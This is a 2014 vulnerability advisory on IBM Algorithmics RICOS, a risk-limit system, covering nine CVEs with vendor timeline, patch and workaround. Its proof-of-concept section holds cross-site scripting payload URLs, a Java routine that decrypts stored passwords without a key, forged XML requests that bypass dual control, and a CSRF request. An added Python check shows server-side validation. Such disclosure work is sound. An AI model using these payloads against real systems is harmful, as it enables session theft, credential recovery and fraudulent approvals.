SEC Consult Vulnerability Lab Security Advisory < 20140630-0 >
=======================================================================
              title: Multiple severe vulnerabilities
            product: IBM Algorithmics RICOS
 vulnerable version: 4.5.0 - 4.7.0
      fixed version: 4.7.0.03
         CVE number: CVE-2014-0894 CVE-2014-0871 CVE-2014-0870 CVE-2014-0869
                     CVE-2014-0868 CVE-2014-0867 CVE-2014-0866 CVE-2014-0865
                     CVE-2014-0864
             impact: critical
           homepage: http://www-01.ibm.com/software/analytics/algorithmics/
              found: 2013-12-19
                 by: A. Kolmann, V. Habsburg-Lothringen, F. Lukavsky
                     SEC Consult Vulnerability Lab
                     https://www.sec-consult.com
=======================================================================

Vendor description:
-------------------
IBM Algorithmics software enables financial institutions and corporate
treasuries to make risk-aware business decisions. Supported by a global team
of risk experts based in all major financial centers, IBM Algorithmics
solution offerings include market, credit and liquidity risk, as well as
collateral and capital management.

Source: http://www-01.ibm.com/software/analytics/algorithmics/

RICOS is a pre-deal limit management solution that is part of the Algo Suite.

Business recommendation:
------------------------
The identified vulnerabilities affect the integrity and confidentiality of the
risk management system. SEC Consult does not recommend relying on RICOS as
part of risk management until a thorough security review has been performed
by security professionals.

As a workaround, access should be limited to trusted internal users, and
sample checks of the plausibility of limits should be performed manually.
Vulnerability overview/description:
-----------------------------------
1) Information Disclosure (PSIRT#1440 / CVE-2014-0871 / CVSS 4.3)
The Tomcat configuration discloses technical details in error messages to the
user, which allows an attacker to collect valuable data about the environment
of the solution.

2) Password Disclosure (PSIRT#1441 / CVE-2014-0894 / CVSS 3.5)
The username and password of the backend database are disclosed in clear text
to the user of the web application. This allows attackers to connect directly
to the backend database and manipulate arbitrary data stored there
(e.g. limits).

3) Non-permanent Cross-Site Scripting (PSIRT#1442 / CVE-2014-0870 / CVSS 4.3)
Several parameters in the RICOS web front end and the Blotter are not properly
sanitized and cause Cross-Site Scripting vulnerabilities. Attackers can steal
user sessions and impersonate other users, performing arbitrary actions on
behalf of the victim user.

4) Broken Encryption (PSIRT#1443 / CVE-2014-0869 / CVSS 4.3)
The weak cryptographic algorithms used to store and transfer users' passwords
allow an attacker to retrieve the plain-text passwords without any knowledge
of cryptographic keys.

5) Manipulation of read-only data / dual control mechanism bypass
   (PSIRT#1444 / CVE-2014-0868 / CVSS 3.5)
Several fields of stored data within RICOS are marked as read-only in the web
application, disallowing modification of those fields. These checks are only
performed client-side, allowing an attacker to alter arbitrary data. An
attacker can create a limit, alter the username of the created limit and
confirm the limit himself, circumventing the dual control mechanisms
advertised by RICOS.

6) Cross-Site Cookie Setting (PSIRT#1445 / CVE-2014-0867 / CVSS 4.3)
A vulnerable page in RICOS allows an attacker to set and overwrite arbitrary
cookies for a user who clicks on a manipulated link.
7) Plain-text submission of passwords (PSIRT#1446 / CVE-2014-0866 / CVSS 4.3)
The RICOS fat client submits user credentials in plain text. An attacker with
access to the network communication can perform man-in-the-middle attacks and
steal user credentials. This vulnerability also applies to the Blotter, where
authentication is performed unencrypted.

8) Client-side Input Validation (PSIRT#1447 / CVE-2014-0865 / CVSS 3.5)
The RICOS fat client performs input validation only on the client side. This
allows an attacker to alter arbitrary data. An attacker can create a limit,
alter the username of the created limit and confirm the limit himself,
circumventing the dual control mechanisms advertised by RICOS.

9) Cross-Site Request Forgery (PSIRT#1448 / CVE-2014-0864 / CVSS 4.3)
The web application does not verify that requests originate from within the
web application, allowing an attacker to trick users into sending requests to
the web application. This allows an attacker to perform tasks on behalf of the
victim user, such as modifying limits.

Proof of concept:
-----------------
1) Information Disclosure
The following URL causes a status 404 response that discloses the Tomcat
version:
https://ricos/ricos470/classes/

If control characters (e.g. \x00) are sent as part of the cookie, a stack
trace is triggered.

2) Password Disclosure
The following request, sent by the client during regular communication, shows
the database connection settings including the username and the password in
clear text.

POST /ricos470/Executer HTTP/1.1
Host: ricos
...SNIP...
<i n="URN" v=""/>
<i n="SecServiceURN" v="obsv2:ricos:20100"/>
<i n="SecSource" v="LM web"/>
<i n="SecTimeout" v="7200"/>
<i n="AcsAutoReconnect" v="Y"/>
<i n="AcsFunctionLimits" v=""/>
</t>
<t n="ObServer">
  <i n="UserId" v=""/>
  <i n="Password" v=""/>
  <i n="Host" v="ricos"/>
  <i n="Port" v="20100"/>
  <i n="CollectionId" v=""/>
  <i n="DbName" v="RICA"/>
  <i n="Location" v="RICA"/>
  <i n="DbType" v="ORA"/>
  <i n="Application" v="RICOS"/>
  <i n="AppId" v="LM web"/>
  <i n="AppDesc" v=""/>
  <i n="AppVer" v="4.7.0"/>
  <i n="Component" v="RICOS Gui"/>
  <i n="DbUser" v="rica"/>
  <i n="DbPass" v="password"/>
...SNIP...

3) Non-permanent Cross-Site Scripting
The following request and URLs demonstrate Cross-Site Scripting
vulnerabilities:

POST /ricos470/rcore6/main/showerror.jsp HTTP/1.1
Host: ricos

Message=<script>alert(document.cookie)</script>%0D%0A&Stack=java.lang....

https://ricos/ricos470/rcore6/main/buttonset.jsp?ButtonsetClass=x";+alert(document.cookie);//x

https://ricos/ricos470/rcore6/frameset.jsp?PROF_NAME=&Caller=login&ChildBrowser=Y&MiniBrowse=Y&OBJECT=profile_login&CAPTION_SELECT=MNU_PROFILE_VIEW&MBName=profile_login')");alert(document.cookie);//

http://ricos/algopds/rcore6/main/browse.jsp?Init=N";alert(document.cookie)&Name=trades&StoreName=trades&HandlerFrame=Caption&ShowStatus=N&HasMargin=Y

http://ricos/algopds/rcore6/main/ibrowseheader.jsp?Name=trades;alert(document.cookie)&StoreName=trades;alert(document.cookie)&STYLESHEET=browse"/><script>alert(document.cookie)</script>

4) Broken Encryption
The user's password is transported frequently in requests within the
application.
The following function decrypts the password without requiring any
cryptographic key:

import java.util.GregorianCalendar;

public static void decrypt(String string) {
    int nRadix = 32;
    int nR2 = nRadix * nRadix / 2;                    // 512
    GregorianCalendar cal = new GregorianCalendar();  // not used by the PoC
    // The "key" is simply the first base-32 pair of the encoded string,
    // so it travels together with the ciphertext.
    String key = string.substring(0, 2);
    int nKey = Integer.parseInt(key, 32);
    String encPw = string.substring(2, string.length());
    int y = 0;
    for (int i = 0; i < encPw.length(); i += 2) {
        // every further base-32 pair encodes one password character
        String aktuell = encPw.substring(i, i + 2);
        int new_value = Integer.parseInt(aktuell, 32);
        int character = - nKey * (y + 1) % nR2 + new_value;
        char decrypt = (char) character;
        System.out.print(decrypt);
        y = y + 1;
    }
}

5) Manipulation of read-only data / dual control mechanism bypass
The following example illustrates how to manipulate a request so that the
server saves it on behalf of another user (only the relevant parts are shown):

<?xml version="1.0" encoding="UTF-8"?>
<ds>
  <t n="Service">
    <i n="RequestType" v="#Action"/>
    <t n="#ActionData">
      <i n="#ActionName" v="web.getmeta_udf"/>
      <i n="#Mode" v="#Sync"/>
      <i n="#Request" v="#Execute"/>
      <t n="#OutputData">
        <t n="#MapTable">
          <i n="#ResultData" v="#ResultData"/>
          <i n="#ResultTable" v="#ResultTable"/>
        </t>
      </t>
      <t n="#InputData">
        <t n="#WorkTable">
          <t n="det_limit">
            <i n="SCTYGEID" v="A"/>
            [...]
            <i n="LMLCURID" v="other_user"/>
            <i n="LMEQEPSTDA" v=""/>
            [...]
            <i n="MFURID" v="other_user"/>
            <i n="LMEVFL" v="N"/>
            <i n="SOLMFL" v="N"/>
            [...]
            <i n="CRURID" v="other_user"/>
            <i n="MFTS" v=""/>
            <i n="MFURID" v="other_user"/>
            [...]
            <i n="CRURID" v="other_user"/>
            <i n="MFTS" v=""/>
            [...]
          </t>
          <t n="Session">
            <t n="SessionData">
              <i n="LoginUser" v="other_user"/>
              <i n="LoginPass" v="8HC34BCM5JE84ND95RED"/>
              [...]
              <i n="LoginUser" v="other_user"/>
              <i n="LoginPWD" v="326K9DC9FNIT3T70A3D6"/>
              <i n="URN" v=""/>
              <i n="SecServiceURN" v="obsv2:ricos:20100"/>
              [...]
            </t>
            <t n="ObServer">
              <i n="UserId" v="other_user"/>
              <i n="Password" v=""/>
              <i n="Host" v="ricos"/>
              [...]
              <i n="Prefix" v="RICA"/>
              <i n="DbSystem" v="oracle"/>
              <i n="LoginUserId" v="other_user"/>
            </t>
          </t>
        </t>
      </t>
    </t>
</ds>

6) Cross-Site Cookie Setting
The following URL allows setting arbitrary cookies:
https://ricos/ricos470/rcore6/main/addcookie.jsp?test-cookie=cookie-content

7) Plain-text submission of passwords
Neither the fat client nor the Blotter use HTTPS to communicate with the
backend server. Both send unencrypted credentials via HTTP during
authentication.

8) Client-side Input Validation
By manipulating the serialized objects transmitted by the fat client, it is
possible to change the name of the user who created a limit, allowing an
attacker to bypass dual control mechanisms.

9) Cross-Site Request Forgery
The following request, sent on behalf of an authenticated user, will e.g.
change the currency of a given deal:

POST http://ricos/ricos470/Executer HTTP/1.1
Host: ricos

<?xml version="1.0" encoding="UTF-8"?>
<ds>
  <t n="Service">
    <i n="RequestType" v="#Action"/>
    <t n="#ActionData">
      <i n="#ActionName" v="web.updrec_msp"/>
      <i n="#Mode" v="#Sync"/>
      <i n="#Request" v="#Execute"/>
      <t n="#InputData">
        <t n="#MapTable">
          <i n="#InputData" v="det_msp"/>
        </t>
        <t n="#WorkTable">
          <t n="det_msp">
            <i n="SYPMID" v="SYS-PAR-ID"/>
            <i n="CUCD" v="USD"/>
            <i n="MIGORILV" v="11"/>
            <i n="ILPLMVFL" v="Y"/>
            <i n="ILNEMVFL" v="Y"/>
            <i n="BSCUONFL" v="N"/>
            <i n="PBSCUOFL" v="N"/>
            <i n="LORICUTEFL" v="N"/>
            <i n="SYSAVAILFL" v="F"/>
            <i n="CUSTID" v="CUSTOMER"/>
            <i n="CBNALI" v="IS-LOCATED-IN"/>
            <i n="CBNAAG" v="AUTOMATIC-GROUP"/>
            <i n="UDF1" v="Welcome to ricos 4.71"/>
          </t>
...SNIP...
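As an added example (not part of this advisory and not RICOS code), the following Python check shows what server-side enforcement for issues 5 and 8 could look like: the user fields of a det_limit request are compared against the server's own session instead of being trusted from the body, and the dual-control rule is checked there too. It uses the <ds>/<t>/<i> request layout from the PoC above and assumes that CRURID and MFURID denote the creator and last modifier of a limit, which the advisory does not spell out.

```python
import xml.etree.ElementTree as ET

# Constructed request in the <ds>/<t>/<i> layout of the PoC (not a real
# capture). CRURID and MFURID are taken to be the creator and last-modifier
# user ids; that is an assumption, the advisory does not define the fields.
SAMPLE_REQUEST = """<ds><t n="Service"><i n="RequestType" v="#Action"/>
 <t n="#ActionData"><i n="#ActionName" v="web.getmeta_udf"/>
  <t n="#InputData"><t n="#WorkTable"><t n="det_limit">
   <i n="SCTYGEID" v="A"/>
   <i n="CRURID" v="other_user"/>
   <i n="MFURID" v="other_user"/>
   <i n="CRURID" v="other_user"/>
  </t></t></t></t></t></ds>"""

USER_FIELDS = ("CRURID", "MFURID")

def limit_user_fields(xml_text):
    """Collect every value the det_limit work table carries for each user
    field (the PoC repeats CRURID, so all copies are checked, not only the
    first one)."""
    root = ET.fromstring(xml_text)
    table = root.find("./t[@n='Service']/t[@n='#ActionData']"
                      "/t[@n='#InputData']/t[@n='#WorkTable']/t[@n='det_limit']")
    if table is None:
        raise ValueError("request carries no det_limit work table")
    return {f: {i.get("v", "") for i in table.findall(f"./i[@n='{f}']")}
            for f in USER_FIELDS}

def validate_limit_request(xml_text, session_user, stored_creator, confirm):
    """Server-side replacement for the client-only read-only checks.
    session_user   - user authenticated by the server's own session, never
                     taken from the request body
    stored_creator - CRURID of the limit as stored in the database (None when
                     the request creates a new limit)
    confirm        - True when the request approves (confirms) the limit
    Returns a list of violations; an empty list means the request may proceed."""
    fields = limit_user_fields(xml_text)
    creator = stored_creator or session_user   # new limit: the caller is creator
    violations = []
    if fields["CRURID"] != {creator}:
        violations.append(f"CRURID {sorted(fields['CRURID'])} != {creator!r}")
    if fields["MFURID"] != {session_user}:
        violations.append(f"MFURID {sorted(fields['MFURID'])} != {session_user!r}")
    # Dual control: the approver must not be the creator of the limit.
    if confirm and session_user == creator:
        violations.append("dual control: creator may not confirm own limit")
    return violations

if __name__ == "__main__":
    # session user "alice" submits the PoC body that names other_user as creator
    for v in validate_limit_request(SAMPLE_REQUEST, "alice", None, True):
        print("rejected:", v)
```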
Vulnerable / tested versions:
-----------------------------
IBM Algorithmics RICOS 4.71

Vendor contact timeline:
------------------------
2014-01-24: Contacting vendor through psirt@vnet.ibm.com
2014-01-24: Vendor response: will likely require more than 30 days to resolve
            the issues; asks for acknowledgements
2014-01-24: Sending acknowledgements
2014-01-29: Vendor assigns PSIRT advisory numbers 1440-1448 to the reported
            issues
2014-02-07: Vendor confirms 8 of 9 vulnerabilities and sends CVE and CVSS
2014-02-10: Providing further information on issue 1441, which was assumed
            to be a false positive
2014-02-14: Telco to clarify vulnerability details and agree on further
            procedure; patches are scheduled for the end of June 2014
2014-02-20: Vendor confirms issue 1441 to be a vulnerability
2014-05-27: Vendor announces that patches will be released on 2014-06-30
2014-06-26: Vendor publishes patches and security bulletin:
            https://www-304.ibm.com/support/entdocview.wss?uid=swg21675881
2014-06-30: SEC Consult publishes the advisory

Solution:
---------
Apply patch ACLM 4.7.0.03 FP5. More information:
https://www-304.ibm.com/support/entdocview.wss?uid=swg21675881

Workaround:
-----------
Limit access to RICOS and manually perform sample checks regarding the
plausibility of limits.

Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab

SEC Consult
Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius

Headquarter:
Mooslackengasse 17, 1190 Vienna, Austria
Phone: +43 1 8903043 0
Fax: +43 1 8903043 15

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

Interested in working with the experts of SEC Consult?
Write to career@sec-consult.com

EOF F. Lukavsky / @2014